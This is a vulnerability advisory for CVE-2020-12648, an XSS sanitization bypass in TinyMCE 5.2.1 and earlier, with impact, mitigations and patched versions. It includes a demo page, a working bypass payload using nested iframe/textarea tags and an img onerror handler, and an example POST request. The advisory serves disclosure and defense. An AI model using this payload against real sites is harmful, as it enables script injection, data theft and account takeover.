TinyMCE — Version 5.2.1

ADVISORY SUMMARY

The following document describes an identified vulnerability in the TinyMCE application in version 5.2.1. TinyMCE is in use on thousands of websites, but the risk and impact of this vulnerability on those sites depend on the details of the application in which TinyMCE is used. The use of "classic" editing mode, existing XSS protections, and whether users can control the initial content inside the editor all affect the exploitability of this vulnerability.

Impact

Applications that use the TinyMCE text editor and do not implement additional XSS protections such as a strict content security policy (CSP) may be vulnerable to XSS. The exploitability and impact of this vulnerability are specific to the deployed application, but could result in sensitive information disclosure, privilege escalation, and account takeover.

Risk Level

High

Affected Vendor

Product Vendor

Product Name

Affected Version

Tiny Technologies, Inc.

TinyMCE 5.2.1 and earlier


Product Description

TinyMCE is a What-You-See-Is-What-You-Get (WYSIWYG) HTML text editor and JavaScript library. It is typically included in third-party websites to provide text editing functionality, including HTML text. The project’s official website is tiny.cloud. The latest versions of the application are 4.9.11, released on July 13, 2020 and 5.4.1, released on July 8, 2020.

Vulnerabilities List:

One vulnerability was identified within the TinyMCE application:

CROSS-SITE SCRIPTING

Solution

Update to version 4.9.11 or 5.4.1


This vulnerability is described in the section below.

VULNERABILITIES


CROSS-SITE SCRIPTING 

TinyMCE is affected by a vulnerability in its stripping and sanitization logic, which allows an attacker to bypass these built-in cross-site scripting (XSS) protections and execute arbitrary JavaScript code. The code was executed within the context of the application that loaded TinyMCE. This vulnerability can be mitigated with holistic XSS protections from the application, such as a strict content security policy (CSP), or by updating TinyMCE to version 4.9.11 or 5.4.1.

CVE ID

Security Risk

Impact

Access Vector

CVE-2020-12648 High Escalation of privileges, Information Disclosure, Other (context-dependent) Remote

 

An XSS vulnerability is present in TinyMCE version 5.2.1. When implemented in classic editing mode, the stripping and sanitization logic of TinyMCE can be bypassed using nested and non-terminated HTML tags, which can allow an attacker to inject an <img>  tag with arbitrary src and onerror values, resulting in XSS.

To demonstrate the vulnerability, an HTML page was created with an instance of the TinyMCE editor, based on the official TinyMCE Quick Start Guide, as shown below:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="https://cdn.tiny.cloud/1/no-api-key/tinymce/5/tinymce.min.js" referrerpolicy="origin"></script>
  <script>
    tinymce.init({
      mode: "textareas"
    });
  </script>
</head>
<body>
<h1>TinyMCE Quick Start Guide</h1>
  <form method="post">
    <textarea name="mytextarea" index="mytextarea">
         <?php echo htmlspecialchars($_POST['mytextarea']) ?>
    </textarea>
    <input type="submit" value="submit">
  </form>
</body>
</html>


This example used PHP to supply user-controlled content to TinyMCE for rendering on page load. The payload could also be supplied directly through the TinyMCE setContent and insertContent functions.

XSS was achieved using the following payload as user-supplied content:

<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">


An example request is shown below:

POST /tinymce.php HTTP/1.1
Host: localhost:8000
…omitted for brevity…

mytextarea=<iframe><textarea></iframe><img src="" onerror="alert(document.domain)">


After the page loaded, the payload executed:

payload executed


This vulnerability was also discovered in TinyMCE version 4.0.26. The impact of this vulnerability depends on the details of the application in which TinyMCE is used.

Patch Details

The patched versions are 4.9.11 and 5.4.1


Credits

Timeline